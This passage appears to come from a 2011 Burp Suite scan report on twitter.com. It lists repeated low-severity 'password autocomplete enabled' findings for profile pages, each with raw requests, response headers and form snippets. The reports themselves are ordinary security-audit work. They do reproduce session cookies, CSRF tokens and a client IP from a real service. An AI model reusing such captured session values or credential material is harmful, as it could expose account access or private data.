...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="6bfd5e96742401b746b35eb192e3a886e11c8f03" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.60. http://twitter.com/ROBERTPLANT

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /ROBERTPLANT

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: session[password]

Request

GET /ROBERTPLANT HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265969-51236-50087
ETag: "2065838d33813f1ed4f56a5980ac687e"
Last-Modified: Sat, 29 Jan 2011 01:52:49 GMT
X-Runtime: 0.02165
Content-Type: text/html; charset=utf-8
Content-Length: 21714
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.61. http://twitter.com/RealLamarOdom

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /RealLamarOdom

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /RealLamarOdom HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:26 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266006-7436-1947
ETag: "176880d5a04c3fcd8b68fb306d4172bf"
Last-Modified: Sat, 29 Jan 2011 01:53:26 GMT
X-Runtime: 0.01342
Content-Type: text/html; charset=utf-8
Content-Length: 49980
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="2e361f1163f1e37128cb49b2eda6bd14a8a5794f" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.62. http://twitter.com/RobertDuffy

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /RobertDuffy

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /RobertDuffy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225077-67311-52082
ETag: "e57068ea600d03f7a7bf890e4a74a917"
Last-Modified: Fri, 28 Jan 2011 14:31:17 GMT
X-Runtime: 0.01335
Content-Type: text/html; charset=utf-8
Content-Length: 50645
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="cd3d1877132c2863a3a85a697772c305b555807b" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.63. http://twitter.com/ScampoLiberty

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /ScampoLiberty

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /ScampoLiberty HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:49:26 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265766-16900-43971
ETag: "8619adc934bf80f7ed7769cb2e43b4b1"
Last-Modified: Sat, 29 Jan 2011 01:49:26 GMT
X-Runtime: 0.00936
Content-Type: text/html; charset=utf-8
Content-Length: 50190
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.64. http://twitter.com/Script_Junkie

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /Script_Junkie

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /Script_Junkie HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225044-37028-38797
ETag: "942c1294489429968d893d85a4217f57"
Last-Modified: Fri, 28 Jan 2011 14:30:44 GMT
X-Runtime: 0.01350
Content-Type: text/html; charset=utf-8
Content-Length: 47541
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="68d5fdac60a8c193baded64b7ccfd29562241f8f" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.65. http://twitter.com/Sean_P_Doyle

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /Sean_P_Doyle

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /Sean_P_Doyle HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265970-13440-19408
ETag: "cb86339c5381a14bf8b1d3e2b36126a2"
Last-Modified: Sat, 29 Jan 2011 01:52:50 GMT
X-Runtime: 0.01448
Content-Type: text/html; charset=utf-8
Content-Length: 49550
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.66. http://twitter.com/Servigistics

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /Servigistics

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /Servigistics HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225035-39147-1499
ETag: "7908e6f2089de69430d5a81b1f257ac2"
Last-Modified: Fri, 28 Jan 2011 14:30:35 GMT
X-Runtime: 0.01232
Content-Type: text/html; charset=utf-8
Content-Length: 50563
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="7d537918332633c74d9f41b4f723cc15da388aef" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.67. http://twitter.com/ShaunieONeal

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /ShaunieONeal

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /ShaunieONeal HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265973-84120-54992
ETag: "f0218d983026f5440ea1c0cdd842e2ee"
Last-Modified: Sat, 29 Jan 2011 01:52:53 GMT
X-Runtime: 0.01493
Content-Type: text/html; charset=utf-8
Content-Length: 50321
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="b6b06753df006052f3c5e2d739bed65d5fa69752" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.68. http://twitter.com/Simply_b06

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /Simply_b06

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: <input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>

Request

GET /Simply_b06 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:08 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225007-69414-28796
ETag: "24db63c3097b33b2dc035ce49f9408ff"
Last-Modified: Fri, 28 Jan 2011 14:30:08 GMT
X-Runtime: 0.01086
Content-Type: text/html; charset=utf-8
Content-Length: 36440
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="ba4ab49562923960d21bc43954a7265ed608015b" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.69. http://twitter.com/Siobhan_Magnus

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /Siobhan_Magnus

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
